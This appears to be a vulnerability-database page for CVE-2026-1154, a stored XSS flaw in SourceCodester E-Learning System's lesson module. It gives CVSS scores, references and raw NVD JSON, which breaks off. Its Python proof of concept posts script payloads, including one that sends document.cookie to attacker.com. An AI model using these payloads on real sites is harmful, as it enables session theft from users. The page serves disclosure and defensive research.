CVE-2026-1154

Description

A flaw has been found in SourceCodester E-Learning System 1.0. This impacts an unknown function of the file /admin/modules/lesson/index.php of the component Lesson Module Handler. Executing a manipulation of the argument Title/Description can lead to basic cross site scripting. The attack can be executed remotely. The exploit has been published and may be used.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:janobe:e-learning_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester E-Learning System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-1154 PoC - SourceCodester E-Learning System XSS
# Target: /admin/modules/lesson/index.php
# Payload: Stored XSS in Title/Description field

import requests
import sys
from urllib.parse import quote

target_url = "http://target.com/admin/modules/lesson/index.php"

# XSS payload - steals cookies
xss_payload = "<script>fetch('https://attacker.com/log?c='+document.cookie)</script>"

# Simple alert payload for testing
alert_payload = "<script>alert('XSS CVE-2026-1154')</script>"

def test_xss():
    """Test for XSS vulnerability in lesson module"""
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0'
    }
    
    # Payload data for lesson creation/edit
    data = {
        'title': alert_payload,
        'description': '<img src=x onerror="alert(document.domain)">',
        'save': '1'
    }
    
    try:
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        print(f"[*] Request sent to {target_url}")
        print(f"[*] Payload: {alert_payload}")
        print(f"[*] Status: {response.status_code}")
        
        # Check if payload is reflected in response
        if alert_payload in response.text:
            print("[+] XSS vulnerability confirmed!")
            print("[+] Payload stored and reflected in response")
        else:
            print("[-] Payload not found in response")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    test_xss()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1154
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1154
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1154/
[4] VulDB https://vuldb.com/cve/CVE-2026-1154
[5] https://gist.github.com/0xCaptainFahim/dada955760b424a851de12bccadee997
[6] https://vuldb.com/?ctiid.341747
[7] https://vuldb.com/?id.341747
[8] https://vuldb.com/?submit.735855
[9] https://www.sourcecodester.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1154", "sourceIdentifier": "[email protected]", "published": "2026-01-19T13:16:20.177", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in SourceCodester E-Learning System 1.0. This impacts an unknown function of the file /admin/modules/lesson/index.php of the component Lesson Module Handler. Executing a manipulation of the argument Title/Description can lead to basic cross site scripting. The attack can be executed remotely. The exploit has been published and may be used."}, {"lang": "es", "value": "Se ha encontrado una falla en SourceCodester E-Learning System 1.0. Esto afecta a una función desconocida del archivo /admin/modules/lesson/index.php del componente Lesson Module Handler. La ejecución de una manipulación del argumento Título/Descripción puede conducir a cross-site scripting básico. El ataque puede ejecutarse de forma remota. El exploit ha sido publicado y puede ser utilizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-80"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:janobe:e-learning_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "85D92133-21C1-489C-B3D8-6B5EE506BC1E"}]}]}], "references": [{"url": "https://gist.github.com/0xCaptainFahim/dada955760b424a851de12bccadee997", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.341747", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.341747", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.735855", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "htt ... (truncated)